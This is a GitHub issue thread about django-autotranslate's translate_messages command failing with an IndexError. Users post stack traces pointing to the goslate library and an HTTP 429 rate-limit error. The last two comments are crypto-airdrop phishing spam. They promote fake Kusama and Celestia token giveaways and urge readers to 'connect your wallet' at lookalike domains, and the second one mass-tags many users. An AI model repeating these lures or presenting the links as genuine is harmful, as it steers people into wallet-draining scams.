### ISSUE TITLE
List index out of range

### ISSUE THREAD

**Issue by krishnaansh** [ankitpopli1891/django-autotranslate#31]
when we type in terminal
python manage.py translate_messages -l de

**Comment by Upasanadhameliya** [comment]
Getting the same error when running `python manage.py translate_messages`

<details>
<summary> Stack Trace</summary>

```
Traceback (most recent call last):
  File "manage.py", line 22, in <module>
    main()
  File "manage.py", line 18, in main
    execute_from_command_line(sys.argv)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\django\core\management\__init__.py", line 419, in execute_from_command_line
    utility.execute()
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\django\core\management\__init__.py", line 413, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\django\core\management\base.py", line 354, in run_from_argv
    self.execute(*args, **cmd_options)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\django\core\management\base.py", line 398, in execute
    output = self.handle(*args, **options)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\autotranslate\management\commands\translate_messages.py", line 63, in handle
    assert getattr(settings, 'LOCALE_PATHS', []), 'locale paths is not configured properly'
AssertionError: locale paths is not configured properly

(concatsa38) d:\upa\comp\projects\demo\fi\concatsa\algodb>python manage.py translate_messages
Traceback (most recent call last):
  File "manage.py", line 22, in <module>
    main()
  File "manage.py", line 18, in main
    execute_from_command_line(sys.argv)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\django\core\management\__init__.py", line 419, in execute_from_command_line
    utility.execute()
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\django\core\management\__init__.py", line 413, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\django\core\management\base.py", line 354, in run_from_argv
    self.execute(*args, **cmd_options)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\django\core\management\base.py", line 398, in execute
    output = self.handle(*args, **options)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\autotranslate\management\commands\translate_messages.py", line 81, in handle
    self.translate_file(root, file, target_language)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\autotranslate\management\commands\translate_messages.py", line 101, in translate_file
    translated_strings = tl.translate_strings(strings, target_language, self.source_language, False)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\autotranslate\services.py", line 46, in translate_strings
    return translations if optimized else [_ for _ in translations]
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\autotranslate\services.py", line 46, in <listcomp>
    return translations if optimized else [_ for _ in translations]
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\goslate.py", line 439, in <genexpr>
    return (_unwrapper_single_element(i) for i in
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\goslate.py", line 201, in _execute
    yield each()
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\goslate.py", line 433, in task
    r = self._translate_single_text(text, target_language, source_language)
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\goslate.py", line 332, in _translate_single_text
    results = list(self._execute(make_task(i) for i in split_text(text)))
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\goslate.py", line 201, in _execute
    yield each()
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\goslate.py", line 330, in <lambda>
    return lambda: self._basic_translate(text, target_language, source_lauguage)[0]
  File "C:\Users\Upasana Dhameliya\.conda\envs\concatsa38\lib\site-packages\goslate.py", line 251, in _basic_translate
    data = {'src': raw_data[-1][0][0]}
IndexError: list index out of range
```
</details>

**Comment by Victhereum** [comment]
> 

Same here, what could be wrong?

**Comment by argolian** [comment]
I tried the following to see if it would work:

`python manage.py translate_messages --source-language en`

and got the following error


<details><summary>Stack Trace</summary>
<p>
<code>
python manage.py translate_messages --source-language en
Traceback (most recent call last):
  File "/home/john/www/travianpy/manage.py", line 22, in <module>
    main()
  File "/home/john/www/travianpy/manage.py", line 18, in main
    execute_from_command_line(sys.argv)
  File "/home/john/www/travianpy/lib/python3.10/site-packages/django/core/management/__init__.py", line 446, in execute_from_command_line
    utility.execute()
  File "/home/john/www/travianpy/lib/python3.10/site-packages/django/core/management/__init__.py", line 440, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "/home/john/www/travianpy/lib/python3.10/site-packages/django/core/management/base.py", line 402, in run_from_argv
    self.execute(*args, **cmd_options)
  File "/home/john/www/travianpy/lib/python3.10/site-packages/django/core/management/base.py", line 448, in execute
    output = self.handle(*args, **options)
  File "/home/john/www/travianpy/lib/python3.10/site-packages/autotranslate/management/commands/translate_messages.py", line 81, in handle
    self.translate_file(root, file, target_language)
  File "/home/john/www/travianpy/lib/python3.10/site-packages/autotranslate/management/commands/translate_messages.py", line 101, in translate_file
    translated_strings = tl.translate_strings(strings, target_language, self.source_language, False)
  File "/home/john/www/travianpy/lib/python3.10/site-packages/autotranslate/services.py", line 48, in translate_strings
    return translations if optimized else [_ for _ in translations]
  File "/home/john/www/travianpy/lib/python3.10/site-packages/autotranslate/services.py", line 48, in <listcomp>
    return translations if optimized else [_ for _ in translations]
  File "/home/john/www/travianpy/lib/python3.10/site-packages/goslate.py", line 447, in <genexpr>
    return (_unwrapper_single_element(i) for i in
  File "/home/john/www/travianpy/lib/python3.10/site-packages/goslate.py", line 221, in _execute
    raise exception
  File "/usr/lib/python3.10/concurrent/futures/thread.py", line 58, in run
    result = self.fn(*self.args, **self.kwargs)
  File "/home/john/www/travianpy/lib/python3.10/site-packages/goslate.py", line 441, in task
    r = self._translate_single_text(text, target_language, source_language)
  File "/home/john/www/travianpy/lib/python3.10/site-packages/goslate.py", line 340, in _translate_single_text
    results = list(self._execute(make_task(i) for i in split_text(text)))
  File "/home/john/www/travianpy/lib/python3.10/site-packages/goslate.py", line 209, in _execute
    yield each()
  File "/home/john/www/travianpy/lib/python3.10/site-packages/goslate.py", line 338, in <lambda>
    return lambda: self._basic_translate(text, target_language, source_lauguage)[0]
  File "/home/john/www/travianpy/lib/python3.10/site-packages/goslate.py", line 257, in _basic_translate
    response_content = self._open_url(url)
  File "/home/john/www/travianpy/lib/python3.10/site-packages/goslate.py", line 197, in _open_url
    raise e
  File "/home/john/www/travianpy/lib/python3.10/site-packages/goslate.py", line 188, in _open_url
    response = self._opener.open(request, timeout=self._TIMEOUT)
  File "/usr/lib/python3.10/urllib/request.py", line 525, in open
    response = meth(req, response)
  File "/usr/lib/python3.10/urllib/request.py", line 634, in http_response
    response = self.parent.error(
  File "/usr/lib/python3.10/urllib/request.py", line 563, in error
    return self._call_chain(*args)
  File "/usr/lib/python3.10/urllib/request.py", line 496, in _call_chain
    result = func(*args)
  File "/usr/lib/python3.10/urllib/request.py", line 643, in http_error_default
    raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 429: Too Many Requests
</code>

</p>
</details> 


Is goslate the issue here?

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)

**Comment by elton** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!redben, @ahsanali17, @humancodex, @nnsdaos, @guirkgumbo, @naveennoel, @thezaidbintariq, @jcstein, @ndhthecatalyst, @ardasevinc, @ququzone, @valterlobo, @yyuuttaaoo, @alirazacodes, @dsimmons, @Gurubalan-GIT, @locvfx, @Skythrill256, @surasithaof, @cDoru
